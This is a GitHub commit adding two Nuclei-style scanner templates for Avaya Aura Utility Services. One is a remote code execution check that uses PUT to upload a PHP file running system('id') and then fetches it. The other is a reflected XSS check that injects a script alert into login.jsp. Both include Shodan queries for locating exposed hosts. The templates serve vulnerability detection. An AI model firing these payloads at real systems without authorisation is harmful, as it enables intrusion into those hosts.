Merge pull request #6671 from projectdiscovery/avaya-aura-rce

Avaya Aura Device Services (XSS & RCE) 🔥
patch-1
pussycat0x 2023-02-04 14:33:07 +05:30 committed by GitHub
commit 7b5674f5ec
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 78 additions and 0 deletions

View File

@ -0,0 +1,41 @@
id: avaya-aura-rce
info:
name: Avaya Aura Utility Services Administration - Remote Code Execution
author: DhiyaneshDk
severity: critical
reference:
- https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/
- https://download.avaya.com/css/public/documents/101076366
metadata:
verified: "true"
shodan-query: html:"Avaya Aura"
tags: rce,avaya,aura,iot
requests:
- raw:
- |
PUT /PhoneBackup/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
User-Agent: AVAYA
Connection: close
<?php system('id');
- |
GET /PhoneBackup/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
User-Agent: AVAYA
Connection: close
matchers-condition: and
matchers:
- type: regex
part: body_2
regex:
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
- type: word
part: header_2
words:
- "text/html"

View File

@ -0,0 +1,37 @@
id: avaya-aura-xss
info:
name: Avaya Aura Utility Services Administration - Cross Site Scripting
author: DhiyaneshDk
severity: medium
reference:
- https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/
- https://download.avaya.com/css/public/documents/101076366
metadata:
verified: "true"
shodan-query: html:"Avaya Aura"
tags: xss,avaya,aura,iot
requests:
- method: GET
path:
- "{{BaseURL}}/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e"
- "{{BaseURL}}/acs/..;/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert(document.domain)</script>'
- 'Avaya Aura Device Services'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200